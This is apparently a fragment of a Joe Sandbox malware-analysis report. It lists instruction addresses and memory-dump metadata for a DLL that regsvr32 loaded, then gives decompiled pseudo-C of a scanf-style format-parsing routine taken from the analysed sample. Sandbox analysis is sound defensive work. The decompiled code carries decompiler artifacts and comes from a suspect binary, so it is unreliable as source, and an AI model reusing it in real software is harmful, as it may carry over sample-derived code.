                                                                              0x1004e060
                                                                              0x1004e064
                                                                              0x1004e067
                                                                              0x1004e06a
                                                                              0x1004e079
                                                                              0x1004e07d
                                                                              0x1004e07d
                                                                              0x1004e082
                                                                              0x1004e084
                                                                              0x1004e086
                                                                              0x1004e086
                                                                              0x1004e086
                                                                              0x1004e089
                                                                              0x1004e094
                                                                              0x1004e096
                                                                              0x1004e0ba
                                                                              0x1004e0bc
                                                                              0x1004e331
                                                                              0x1004e337
                                                                              0x1004e406
                                                                              0x1004e40c
                                                                              0x1004e413
                                                                              0x1004e419
                                                                              0x1004e41a
                                                                              0x1004e422
                                                                              0x1004e425
                                                                              0x1004e428
                                                                              0x1004e42b
                                                                              0x1004e432
                                                                              0x1004e434
                                                                              0x1004e439
                                                                              0x1004e43e
                                                                              0x1004e440
                                                                              0x1004e442
                                                                              0x1004e442
                                                                              0x1004e455
                                                                              0x1004e459
                                                                              0x1004e45d
                                                                              0x1004e462
                                                                              0x1004e467
                                                                              0x1004e46a
                                                                              0x1004e46a
                                                                              0x1004e46f
                                                                              0x1004e484
                                                                              0x1004e484
                                                                              0x1004e487
                                                                              0x1004e487
                                                                              0x1004e48a
                                                                              0x1004e494
                                                                              0x1004e48c
                                                                              0x1004e48e
                                                                              0x1004e48e
                                                                              0x1004e498
                                                                              0x1004e49c
                                                                              0x1004e49c
                                                                              0x1004e49c
                                                                              0x1004e4a2
                                                                              0x1004e4aa
                                                                              0x00000000
                                                                              0x1004e4aa
                                                                              0x1004e33d
                                                                              0x1004e348
                                                                              0x1004e34d
                                                                              0x1004e353
                                                                              0x1004e354
                                                                              0x1004e358
                                                                              0x1004e35b
                                                                              0x1004e35e
                                                                              0x1004e361
                                                                              0x1004e363
                                                                              0x1004e369
                                                                              0x1004e36b
                                                                              0x1004e371
                                                                              0x1004e376
                                                                              0x1004e378
                                                                              0x1004e380
                                                                              0x1004e380
                                                                              0x1004e393
                                                                              0x1004e397
                                                                              0x1004e39b
                                                                              0x1004e3a0
                                                                              0x1004e3a5
                                                                              0x1004e3a8
                                                                              0x1004e3a8
                                                                              0x1004e3ad
                                                                              0x1004e3c2
                                                                              0x1004e3c2
                                                                              0x1004e3c5
                                                                              0x1004e3c5
                                                                              0x1004e3c8
                                                                              0x1004e3d2
                                                                              0x1004e3ca
                                                                              0x1004e3cc
                                                                              0x1004e3cc
                                                                              0x1004e3d6
                                                                              0x1004e3da
                                                                              0x1004e3da
                                                                              0x1004e3da
                                                                              0x1004e3e0
                                                                              0x1004e3e6
                                                                              0x1004e3ed
                                                                              0x1004e3f5
                                                                              0x1004e3fa
                                                                              0x1004e3fd
                                                                              0x1004e3fd
                                                                              0x00000000
                                                                              0x1004e3fd
                                                                              0x1004e0c2
                                                                              0x1004e0c5
                                                                              0x1004e0ca
                                                                              0x1004e0d5
                                                                              0x1004e0d8
                                                                              0x1004e0e2
                                                                              0x1004e0e3
                                                                              0x1004e0e9
                                                                              0x1004e0ec
                                                                              0x1004e0ef
                                                                              0x1004e0f1
                                                                              0x1004e0f7
                                                                              0x1004e0f9
                                                                              0x1004e0ff
                                                                              0x1004e102
                                                                              0x1004e105
                                                                              0x1004e107
                                                                              0x1004e110
                                                                              0x1004e110
                                                                              0x1004e118
                                                                              0x1004e122
                                                                              0x1004e128
                                                                              0x1004e12c
                                                                              0x1004e131
                                                                              0x1004e136
                                                                              0x1004e139
                                                                              0x1004e139
                                                                              0x1004e13e
                                                                              0x1004e14b
                                                                              0x1004e153
                                                                              0x1004e156
                                                                              0x1004e156
                                                                              0x1004e160
                                                                              0x1004e160
                                                                              0x1004e163
                                                                              0x1004e16d
                                                                              0x1004e165
                                                                              0x1004e167
                                                                              0x1004e167
                                                                              0x1004e171
                                                                              0x1004e175
                                                                              0x1004e175
                                                                              0x1004e175
                                                                              0x1004e17b
                                                                              0x1004e182
                                                                              0x1004e18b
                                                                              0x1004e18e
                                                                              0x1004e18f
                                                                              0x1004e192
                                                                              0x1004e194
                                                                              0x1004e19a
                                                                              0x1004e1a0
                                                                              0x1004e1a3
                                                                              0x1004e1a3
                                                                              0x1004e1ab
                                                                              0x1004e1af
                                                                              0x1004e261
                                                                              0x1004e261
                                                                              0x1004e268
                                                                              0x1004e26d
                                                                              0x1004e26d
                                                                              0x1004e271
                                                                              0x1004e274
                                                                              0x1004e277
                                                                              0x1004e281
                                                                              0x1004e283
                                                                              0x1004e28a
                                                                              0x1004e28a
                                                                              0x1004e28f
                                                                              0x1004e295
                                                                              0x1004e298
                                                                              0x1004e29e
                                                                              0x1004e29f
                                                                              0x1004e2a2
                                                                              0x1004e2a4
                                                                              0x1004e2aa
                                                                              0x1004e2ac
                                                                              0x1004e2b2
                                                                              0x1004e2b7
                                                                              0x1004e2b7
                                                                              0x1004e2b9
                                                                              0x1004e2c0
                                                                              0x1004e2c0
                                                                              0x1004e2d3
                                                                              0x1004e2d7
                                                                              0x1004e2db
                                                                              0x1004e2e0
                                                                              0x1004e2e5
                                                                              0x1004e2e8
                                                                              0x1004e2e8
                                                                              0x1004e2ee
                                                                              0x1004e2f6
                                                                              0x1004e301
                                                                              0x1004e301
                                                                              0x1004e304
                                                                              0x1004e304
                                                                              0x1004e307
                                                                              0x1004e311
                                                                              0x1004e309
                                                                              0x1004e30b
                                                                              0x1004e30b
                                                                              0x1004e315
                                                                              0x1004e319
                                                                              0x1004e319
                                                                              0x1004e319
                                                                              0x1004e31f
                                                                              0x1004e327
                                                                              0x1004e32a
                                                                              0x00000000
                                                                              0x1004e32a
                                                                              0x1004e1ba
                                                                              0x1004e1bf
                                                                              0x1004e1c1
                                                                              0x1004e1c5
                                                                              0x1004e1e8
                                                                              0x1004e1e8
                                                                              0x1004e1ef
                                                                              0x1004e1f5
                                                                              0x1004e1f6
                                                                              0x1004e1f9
                                                                              0x1004e1fb
                                                                              0x1004e203
                                                                              0x1004e209
                                                                              0x1004e211
                                                                              0x1004e214
                                                                              0x1004e216
                                                                              0x1004e21a
                                                                              0x1004e21c
                                                                              0x1004e223
                                                                              0x1004e223
                                                                              0x1004e228
                                                                              0x1004e228
                                                                              0x1004e228
                                                                              0x1004e22c
                                                                              0x1004e231
                                                                              0x1004e233
                                                                              0x1004e236
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004e238
                                                                              0x1004e238
                                                                              0x1004e238
                                                                              0x1004e23a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004e240
                                                                              0x1004e242
                                                                              0x1004e246
                                                                              0x1004e249
                                                                              0x1004e251
                                                                              0x1004e251
                                                                              0x1004e256
                                                                              0x1004e256
                                                                              0x1004e25b
                                                                              0x1004e25b
                                                                              0x1004e25f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004e25f
                                                                              0x1004e24b
                                                                              0x1004e24f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004e24f
                                                                              0x00000000
                                                                              0x1004e238
                                                                              0x1004e21e
                                                                              0x1004e221
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004e221
                                                                              0x1004e1c7
                                                                              0x1004e1cb
                                                                              0x1004e1ce
                                                                              0x1004e1d1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004e1d7
                                                                              0x1004e1d7
                                                                              0x1004e1d7
                                                                              0x1004e1db
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004e1dd
                                                                              0x1004e1e1
                                                                              0x1004e1e4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004e1e6
                                                                              0x00000000
                                                                              0x1004e098
                                                                              0x1004e098
                                                                              0x1004e0a0
                                                                              0x1004e0a5
                                                                              0x1004e0a9
                                                                              0x1004e0ac
                                                                              0x1004e0b1
                                                                              0x1004e0b1
                                                                              0x1004e4b0
                                                                              0x1004e4c7
                                                                              0x1004e4c7
                                                                              0x1004e4ce
                                                                              0x1004e4e4
                                                                              0x1004e4ed
                                                                              0x1004e4f0
                                                                              0x1004e4f7
                                                                              0x1004e4ff
                                                                              0x1004e502
                                                                              0x1004e50a
                                                                              0x1004e525
                                                                              0x1004e528
                                                                              0x1004e52a
                                                                              0x1004e52a
                                                                              0x1004e53b
                                                                              0x1004e50c
                                                                              0x1004e510
                                                                              0x1004e516
                                                                              0x1004e524
                                                                              0x1004e524
                                                                              0x1004e50a
                                                                              0x1004e096
                                                                              0x1004df9d
                                                                              0x1004dfa2
                                                                              0x1004dfa4
                                                                              0x1004dfa8
                                                                              0x1004dfd2
                                                                              0x1004dfd5
                                                                              0x1004dfd9
                                                                              0x1004dfda
                                                                              0x1004dfdd
                                                                              0x1004dfdf
                                                                              0x1004dfe7
                                                                              0x1004dff2
                                                                              0x1004dffa
                                                                              0x1004dffc
                                                                              0x1004dfff
                                                                              0x1004e001
                                                                              0x1004e007
                                                                              0x1004e007
                                                                              0x1004e00c
                                                                              0x1004e00c
                                                                              0x1004e00c
                                                                              0x1004e010
                                                                              0x1004e015
                                                                              0x1004e017
                                                                              0x1004e01a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004e020
                                                                              0x1004e020
                                                                              0x1004e022
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004e028
                                                                              0x1004e02a
                                                                              0x1004e02e
                                                                              0x1004e031
                                                                              0x1004e039
                                                                              0x1004e039
                                                                              0x1004e03e
                                                                              0x1004e03e
                                                                              0x1004e043
                                                                              0x1004e043
                                                                              0x1004e047
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004e047
                                                                              0x1004e033
                                                                              0x1004e037
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004e037
                                                                              0x00000000
                                                                              0x1004e020
                                                                              0x1004e003
                                                                              0x1004e005
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004e005
                                                                              0x1004dfaa
                                                                              0x1004dfae
                                                                              0x1004dfb1
                                                                              0x1004dfb5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004dfc0
                                                                              0x1004dfc0
                                                                              0x1004dfc4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004dfc6
                                                                              0x1004dfca
                                                                              0x1004dfce
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004dfd0
                                                                              0x00000000
                                                                              0x1004dfc0
                                                                              0x1004def3
                                                                              0x1004def5
                                                                              0x1004def8
                                                                              0x1004df00
                                                                              0x1004df06
                                                                              0x1004df0e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004df10
                                                                              0x00000000
                                                                              0x1004df10
                                                                              0x1004df1b
                                                                              0x1004df20
                                                                              0x1004df24
                                                                              0x1004df29
                                                                              0x1004df29
                                                                              0x00000000

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 87f5fcc7282ea56948c4ea0f16b442c82826c77275ed318c784d6a6291397173
                                                                              • Instruction ID: fa0d184ccb76b362a19351198ed8709fe01172cf12946f65a83fd6825cdabeb9
                                                                              • Opcode Fuzzy Hash: 87f5fcc7282ea56948c4ea0f16b442c82826c77275ed318c784d6a6291397173
                                                                              • Instruction Fuzzy Hash: 990223777186808BC720CF29E44475AB7E2F3C8785F258235DB8AD7B58EA7CD9848B04
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10043040 Relevance: .4, Instructions: 444COMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 81%
                                                                              			E10043040(signed int __ebp, signed long long __rbx, signed int __rcx, signed long long __rdx, long long __rdi, long long __rsi, signed int __r8, signed short* __r9, long long __r10, long long __r12, long long __r13, signed long long __r14, long long __r15) {
				signed short _t206;
				signed int _t208;
				signed int _t209;
				signed int _t222;
				signed short _t230;
				signed int _t231;
				signed int _t232;
				signed short _t234;
				signed int _t235;
				signed int _t236;
				signed int _t239;
				signed int _t241;
				signed short _t243;
				signed int _t244;
				signed char _t245;
				signed long long _t246;
				void* _t247;
				signed int _t260;
				signed int _t263;
				signed int _t265;
				signed long long _t268;
				signed long long _t269;
				signed long long _t272;
				long long _t273;
				signed long long _t274;
				signed long long _t280;
				signed short* _t287;
				signed short* _t289;
				long long _t291;
				signed long long _t292;
				signed long long _t294;
				long long _t298;
				intOrPtr* _t299;
				signed long long _t300;
				signed long long _t301;
				signed long long _t302;
				signed long long _t303;
				signed long long _t305;
				long long _t307;
				signed long long _t309;

				_t311 = __r15;
				_t309 = __r14;
				_t307 = __r13;
				_t297 = __r10;
				_t296 = __r9;
				_t295 = __r8;
				_t284 = __rdi;
				_t283 = __rdx;
				_t276 = __rcx;
				_t274 = __rbx;
				_t263 = __ebp;
				_t301 = _t294;
				_t268 =  *0x1006f4c8; // 0x6f13091946cb
				_t269 = _t268 ^ _t294;
				 *(_t294 + 0x3a0) = _t269;
				 *((long long*)(_t301 - 8)) = __rbx;
				 *((long long*)(_t301 - 0x10)) = _t291;
				 *((long long*)(_t301 - 0x18)) = __rsi;
				 *((long long*)(_t301 - 0x20)) = __rdi;
				 *((long long*)(_t301 - 0x28)) = __r12;
				 *((long long*)(_t301 - 0x38)) = __r14;
				r14d = 0;
				_t292 = _t301 - 0x318;
				_t260 = 0;
				 *((long long*)(_t301 - 0x40)) = __r15;
				 *((long long*)(_t294 + 0xa8)) = __r9;
				 *(_t294 + 0x80) = r14d;
				 *((long long*)(_t294 + 0x58)) = __r14;
				 *(_t294 + 0xb0) = r14d;
				_t243 = r14d;
				 *(_t294 + 0x3c) = r14d;
				_t287 = __rdx;
				 *(_t294 + 0x78) = __rdx;
				_t305 = __rcx;
				 *((long long*)(_t294 + 0x70)) = __rcx;
				 *(_t294 + 0x48) = _t292;
				r15d = 0x15e;
				if(__rdx != 0) {
					__eflags = __rcx;
					if(__rcx == 0) {
						goto L1;
					}
					__eflags = __r8;
					 *(_t294 + 0xd0) = _t243;
					if(__r8 != 0) {
						_t279 = _t294 + 0xb8;
						 *_t279 =  *((intOrPtr*)(__r8));
						_t271 =  *((intOrPtr*)(__r8 + 8));
						 *(_t279 + 8) = _t271;
						_t302 =  *(_t294 + 0xc8);
					} else {
						E1003D060(_t269, __rbx, __rcx, __rdx, __rdi, __rdx, _t292, __r8, __rcx);
						_t302 = _t269;
						 *(_t294 + 0xc8) = _t269;
						_t271 =  *((intOrPtr*)(_t269 + 0xc0));
						__eflags = _t271 -  *0x100703d0; // 0x10070270
						 *(_t294 + 0xb8) = _t271;
						_t279 =  *((intOrPtr*)(_t302 + 0xb8));
						 *(_t294 + 0xc0) = _t279;
						if(__eflags != 0) {
							_t241 =  *(_t302 + 0xc8);
							__eflags =  *0x10070258 & _t241;
							if(( *0x10070258 & _t241) == 0) {
								E10047EE0(_t247, _t271, _t279, __rdx, __r8, _t305);
								_t302 =  *(_t294 + 0xc8);
								_t279 =  *(_t294 + 0xc0);
								 *(_t294 + 0xb8) = _t271;
							}
						}
						__eflags = _t279 -  *0x10070150; // 0x23a5c20
						if(__eflags != 0) {
							_t239 =  *(_t302 + 0xc8);
							__eflags =  *0x10070258 & _t239;
							if(( *0x10070258 & _t239) == 0) {
								E10047300(_t247, _t271, _t274, _t279, _t283, _t284, _t287, _t292, _t305);
								_t302 =  *(_t294 + 0xc8);
								 *(_t294 + 0xc0) = _t271;
							}
						}
						__eflags =  *(_t302 + 0xc8) & 0x00000002;
						if(( *(_t302 + 0xc8) & 0x00000002) == 0) {
							 *(_t302 + 0xc8) =  *(_t302 + 0xc8) | 0x00000002;
							_t302 =  *(_t294 + 0xc8);
							 *(_t294 + 0xd0) = 1;
						}
					}
					 *((long long*)(_t294 + 0x3c8)) = _t307;
					 *(_t294 + 0x34) = r14d;
					 *(_t294 + 0x42) = 0;
					_t206 =  *_t287 & 0x0000ffff;
					r13d = r14d;
					__eflags = _t206;
					_t248 = r14d;
					 *(_t294 + 0x38) = r14d;
					if(_t206 == 0) {
						L101:
						__eflags =  *(_t294 + 0xd0);
						if( *(_t294 + 0xd0) != 0) {
							_t190 = _t302 + 0xc8;
							 *_t190 =  *(_t302 + 0xc8) & 0xfffffffd;
							__eflags =  *_t190;
						}
						goto L104;
					} else {
						do {
							_t255 = 8;
							_t248 = _t206 & 0x0000ffff;
							_t208 = E1004A660(_t248, 8, _t279, _t305);
							__eflags = _t208;
							if(_t208 == 0) {
								_t296 =  *(_t294 + 0x78);
								__eflags =  *_t296 - 0x25;
								if( *_t296 != 0x25) {
									r13d = r13d + 1;
									_t279 = _t305;
									 *(_t294 + 0x34) = r13d;
									_t209 = E1004A090(_t243, 8, _t260, _t263, _t271, _t274, _t279, _t283, _t284, _t287, _t292, _t295, _t296, _t302, _t305, _t307, _t309, _t311);
									_t289 =  *(_t294 + 0x78);
									_t260 = _t209;
									_t287 =  &(_t289[1]);
									__eflags = ( *_t289 & 0x0000ffff) - _t260;
									 *(_t294 + 0x78) = _t287;
									if(( *_t289 & 0x0000ffff) != _t260) {
										__eflags = _t260 - 0xffff;
										if(_t260 == 0xffff) {
											_t303 =  *((intOrPtr*)(_t294 + 0x58));
											r12d =  *(_t294 + 0x38);
											_t244 =  *(_t294 + 0x3c);
										} else {
											_t283 = _t305;
											_t248 = _t260 & 0x0000ffff;
											E1004A2A0(_t260 & 0x0000ffff, 8, _t274, _t305, _t284, _t287, _t295, _t296, _t302, _t305);
											_t303 =  *((intOrPtr*)(_t294 + 0x58));
											r12d =  *(_t294 + 0x38);
											_t244 =  *(_t294 + 0x3c);
										}
										L85:
										__eflags =  *(_t294 + 0xb0) - 1;
										if( *(_t294 + 0xb0) == 1) {
											_t279 = _t303;
											E10039620(_t271, _t303);
										}
										__eflags =  *(_t294 + 0x80) - 1;
										if( *(_t294 + 0x80) == 1) {
											_t279 = _t292;
											E10039620(_t271, _t292);
										}
										__eflags = _t260 - 0xffff;
										if(_t260 != 0xffff) {
											__eflags = _t244 - 1;
											if(_t244 != 1) {
												_t302 =  *(_t294 + 0xc8);
												_t248 =  *(_t294 + 0x38);
												goto L101;
											}
											E1003AF40(_t271);
											r9d = 0;
											r8d = 0;
											_t248 = 0;
											 *(_t294 + 0x20) = 0;
											 *_t271 = 0x16;
											E1003C790(_t274, _t279, _t283, _t284, _t287, _t292, _t295);
											__eflags =  *(_t294 + 0xd0);
											if( *(_t294 + 0xd0) != 0) {
												_t280 =  *(_t294 + 0xc8);
												_t185 = _t280 + 0xc8;
												 *_t185 =  *(_t280 + 0xc8) & 0xfffffffd;
												__eflags =  *_t185;
											}
											goto L104;
										} else {
											__eflags = r12d;
											if(r12d != 0) {
												L93:
												L94:
												__eflags =  *(_t294 + 0xd0);
												if( *(_t294 + 0xd0) != 0) {
													 *( *(_t294 + 0xc8) + 0xc8) =  *( *(_t294 + 0xc8) + 0xc8) & 0xfffffffd;
												}
												L104:
												L105:
												return E10038D20(_t248,  *(_t294 + 0x3a0) ^ _t294);
											}
											__eflags =  *(_t294 + 0x42) & 0x000000ff;
											if(( *(_t294 + 0x42) & 0x000000ff) != 0) {
												goto L93;
											}
											goto L94;
										}
									}
									L66:
									__eflags = _t260 - 0xffff;
									if(_t260 != 0xffff) {
										goto L69;
									}
									__eflags =  *_t287 - 0x25;
									if( *_t287 != 0x25) {
										_t303 =  *((intOrPtr*)(_t294 + 0x58));
										r12d =  *(_t294 + 0x38);
										_t244 =  *(_t294 + 0x3c);
										goto L85;
									}
									__eflags = _t287[1] - 0x6e;
									if(_t287[1] != 0x6e) {
										_t303 =  *((intOrPtr*)(_t294 + 0x58));
										r12d =  *(_t294 + 0x38);
										_t244 =  *(_t294 + 0x3c);
										goto L85;
									}
									goto L69;
								}
								_t257 = 0;
								r13d = 0;
								r8d = 0;
								r14d = 0;
								bpl = 0;
								 *(_t294 + 0xa4) = r13d;
								 *((short*)(_t294 + 0x90)) = 0;
								 *(_t294 + 0x60) = r13d;
								r13b = 1;
								_t287 = 0x10000000;
								 *(_t294 + 0x68) = r8d;
								 *(_t294 + 0x50) = 0;
								 *(_t294 + 0x88) = _t309;
								 *((char*)(_t294 + 0x41)) = 0;
								 *((char*)(_t294 + 0x54)) = 0;
								 *(_t294 + 0x30) = 0;
								 *((char*)(_t294 + 0xa0)) = 0;
								r12b = 0;
								__eflags = r12b;
								do {
									_t245 = _t296[1] & 0x0000ffff;
									_t296 =  &(_t296[1]);
									__eflags = _t245 & 0x0000ff00;
									 *(_t294 + 0x78) = _t296;
									if((_t245 & 0x0000ff00) != 0) {
										L27:
										_t246 = _t245 + 0xffffffd6;
										__eflags = _t246 - 0x4d;
										if(_t246 > 0x4d) {
											bpl = bpl + 1;
											goto L30;
										}
										_t271 = _t246;
										_t279 = _t287 + _t279;
										goto __rcx;
									}
									_t222 = E10049E60(_t245, _t245 & 0x000000ff, _t283, _t284, _t287, _t292, _t295, _t297, _t305, _t307, _t309, _t311);
									__eflags = _t222;
									if(_t222 == 0) {
										_t257 =  *(_t294 + 0x50);
										r8d =  *(_t294 + 0x68);
										_t296 =  *(_t294 + 0x78);
										goto L27;
									}
									r8d =  *(_t294 + 0x68);
									_t296 =  *(_t294 + 0x78);
									_t248 =  *(_t294 + 0x30) & 0x000000ff;
									r8d = r8d + 1;
									_t257 = _t274 + _t271 * 2 - 0x30;
									 *(_t294 + 0x68) = r8d;
									 *(_t294 + 0x50) = _t257;
									L30:
									__eflags = bpl;
								} while (bpl == 0);
								__eflags = _t248;
								 *(_t294 + 0x40) = r13b;
								r13d =  *(_t294 + 0xa4);
								 *(_t294 + 0x64) = r14d;
								_t309 =  *(_t294 + 0x88);
								if(_t248 != 0) {
									 *(_t294 + 0x88) = _t309;
								} else {
									_t272 =  *((intOrPtr*)(_t294 + 0xa8));
									 *(_t294 + 0xd8) = _t272;
									_t273 = _t272 + 8;
									 *((long long*)(_t294 + 0xa8)) = _t273;
									_t271 =  *((intOrPtr*)(_t273 - 8));
									 *(_t294 + 0x88) = _t271;
								}
								_t243 = 0;
								__eflags = r12b;
								if(r12b != 0) {
									L39:
									_t263 =  *_t296 & 0x0000ffff | 0x00000020;
									__eflags = _t263 - 0x6e;
									 *(_t294 + 0xa4) = _t263;
									if(_t263 == 0x6e) {
										L49:
										__eflags = r8d;
										if(r8d == 0) {
											L51:
											__eflags = _t248;
											if(_t248 != 0) {
												_t298 =  *((intOrPtr*)(_t294 + 0xa8));
												_t302 =  *(_t294 + 0xd8);
												L60:
												_t121 = _t292 - 0x63; // -100
												__eflags = _t121 - 0x18;
												if(_t121 > 0x18) {
													__eflags =  *_t296 - _t260;
													if( *_t296 != _t260) {
														__eflags = _t260 - 0xffff;
														if(_t260 != 0xffff) {
															_t283 =  *((intOrPtr*)(_t294 + 0x70));
															_t248 = _t260 & 0x0000ffff;
															E1004A2A0(_t260 & 0x0000ffff, _t257, _t274,  *((intOrPtr*)(_t294 + 0x70)), _t284, _t287, _t295, _t296, _t302, _t305);
														}
														_t292 =  *(_t294 + 0x48);
														_t303 =  *((intOrPtr*)(_t294 + 0x58));
														r12d =  *(_t294 + 0x38);
														_t244 = 1;
														goto L85;
													}
													 *(_t294 + 0x42) =  *(_t294 + 0x42) + 0xff;
													_t292 =  *(_t294 + 0x48);
													r13d =  *(_t294 + 0x34);
													__eflags = _t248;
													_t297 =  ==  ? _t302 : _t298;
													 *((long long*)(_t294 + 0xa8)) =  ==  ? _t302 : _t298;
													 *(_t294 + 0x42) =  *(_t294 + 0x42) + 1;
													_t305 =  *((intOrPtr*)(_t294 + 0x70));
													_t287 =  &(( *(_t294 + 0x78))[1]);
													 *(_t294 + 0x78) = _t287;
													goto L66;
												}
												_t248 =  *(0x10000000 + 0x44924 + _t271 * 4);
												_t271 = 0x10000000;
												_t279 = 0x20000000;
												goto __rcx;
											}
											__eflags = _t263 - 0x63;
											if(_t263 == 0x63) {
												L55:
												_t299 =  *(_t294 + 0xd8);
												_t271 =  *_t299;
												_t300 = _t299 + 8;
												r14d =  *_t300;
												_t302 = _t300;
												 *(_t294 + 0xd8) = _t300;
												_t298 = _t300 + 8;
												__eflags = _t309 - 1;
												 *(_t294 + 0x88) = _t271;
												 *((long long*)(_t294 + 0xa8)) = _t298;
												if(_t309 >= 1) {
													goto L60;
												}
												__eflags = r12b;
												if(r12b <= 0) {
													 *_t271 = 0;
												} else {
													 *_t271 = 0;
												}
												E1003AF40(_t271);
												_t292 =  *(_t294 + 0x48);
												_t303 =  *((intOrPtr*)(_t294 + 0x58));
												r12d =  *(_t294 + 0x38);
												_t244 =  *(_t294 + 0x3c);
												 *_t271 = 0xc;
												goto L85;
											}
											__eflags = _t263 - 0x73;
											if(_t263 == 0x73) {
												goto L55;
											}
											__eflags = _t263 - 0x7b;
											if(_t263 != 0x7b) {
												_t298 =  *((intOrPtr*)(_t294 + 0xa8));
												_t302 =  *(_t294 + 0xd8);
												goto L60;
											}
											goto L55;
										}
										__eflags = _t257;
										if(_t257 == 0) {
											__eflags = _t260 - 0xffff;
											if(_t260 == 0xffff) {
												_t292 =  *(_t294 + 0x48);
												_t303 =  *((intOrPtr*)(_t294 + 0x58));
												r12d =  *(_t294 + 0x38);
												_t244 = r14d;
											} else {
												_t283 =  *((intOrPtr*)(_t294 + 0x70));
												_t248 = _t260 & 0x0000ffff;
												E1004A2A0(_t260 & 0x0000ffff, _t257, _t274,  *((intOrPtr*)(_t294 + 0x70)), _t284, _t287, _t295, _t296, _t302, _t305);
												_t292 =  *(_t294 + 0x48);
												_t303 =  *((intOrPtr*)(_t294 + 0x58));
												r12d =  *(_t294 + 0x38);
												_t244 = r14d;
											}
											goto L85;
										}
										goto L51;
									}
									__eflags = _t263 - 0x63;
									if(_t263 == 0x63) {
										L46:
										_t279 =  *((intOrPtr*)(_t294 + 0x70));
										_t107 = _t294 + 0x34;
										 *_t107 =  *(_t294 + 0x34) + 1;
										__eflags =  *_t107;
										_t260 = E1004A090(_t243, _t257, _t260, _t263, _t271, _t274, _t279, _t283, _t284, _t287, _t292, _t295, _t296, _t302, _t305, _t307, _t309, _t311);
										L47:
										__eflags = _t260 - 0xffff;
										if(_t260 == 0xffff) {
											_t292 =  *(_t294 + 0x48);
											_t303 =  *((intOrPtr*)(_t294 + 0x58));
											r12d =  *(_t294 + 0x38);
											_t244 = r14d;
											goto L85;
										}
										_t257 =  *(_t294 + 0x50);
										r8d =  *(_t294 + 0x68);
										_t296 =  *(_t294 + 0x78);
										_t248 =  *(_t294 + 0x30);
										goto L49;
									}
									__eflags = _t263 - 0x7b;
									if(_t263 == 0x7b) {
										goto L46;
									}
									_t265 =  *(_t294 + 0x34);
									_t274 =  *((intOrPtr*)(_t294 + 0x70));
									while(1) {
										_t279 = _t274;
										_t265 = _t265 + 1;
										_t230 = E1004A090(_t243, _t257, _t260, _t265, _t271, _t274, _t279, _t283, _t284, _t287, _t292, _t295, _t296, _t302, _t305, _t307, _t309, _t311);
										__eflags = _t230 - 0xffff;
										_t260 = _t230 & 0x0000ffff;
										if(_t230 == 0xffff) {
											break;
										}
										_t257 = 8;
										_t248 = _t230 & 0x0000ffff;
										_t231 = E1004A660(_t230 & 0x0000ffff, 8, _t279, _t305);
										__eflags = _t231;
										if(_t231 != 0) {
											continue;
										}
										break;
									}
									 *(_t294 + 0x34) = _t265;
									_t263 =  *(_t294 + 0xa4);
									_t243 = r14b & 0xffffffff;
									goto L47;
								} else {
									_t232 =  *_t296 & 0x0000ffff;
									__eflags = _t232 - 0x53;
									if(_t232 == 0x53) {
										L38:
										r12b = 0xff;
										goto L39;
									}
									__eflags = _t232 - 0x43;
									if(_t232 == 0x43) {
										goto L38;
									}
									r12b = 1;
									goto L39;
								}
							}
							r13d = r13d - 1;
							__eflags = r13d;
							while(1) {
								r13d = r13d + 1;
								_t279 = _t305;
								 *(_t294 + 0x34) = r13d;
								_t234 = E1004A090(_t243, _t255, _t260, _t263, _t271, _t274, _t279, _t283, _t284, _t287, _t292, _t295, _t296, _t302, _t305, _t307, _t309, _t311);
								__eflags = _t234 - 0xffff;
								_t243 = _t234 & 0x0000ffff;
								if(_t234 == 0xffff) {
									break;
								}
								_t255 = 8;
								_t236 = E1004A660(_t234 & 0x0000ffff, 8, _t279, _t305);
								__eflags = _t236;
								if(_t236 != 0) {
									continue;
								}
								_t283 = _t305;
								E1004A2A0(_t243 & 0x0000ffff, 8, _t274, _t305, _t284, _t287, _t295, _t296, _t302, _t305);
								do {
									goto L19;
								} while (_t235 != 0);
								 *(_t294 + 0x78) = _t287;
								goto L69;
							}
							L19:
							_t248 = _t287[1] & 0x0000ffff;
							_t287 =  &(_t287[1]);
							_t235 = E1004A660(_t248, 8, _t279, _t305);
							__eflags = _t235;
							L69:
							_t206 =  *_t287;
							__eflags = _t206;
						} while (_t206 != 0);
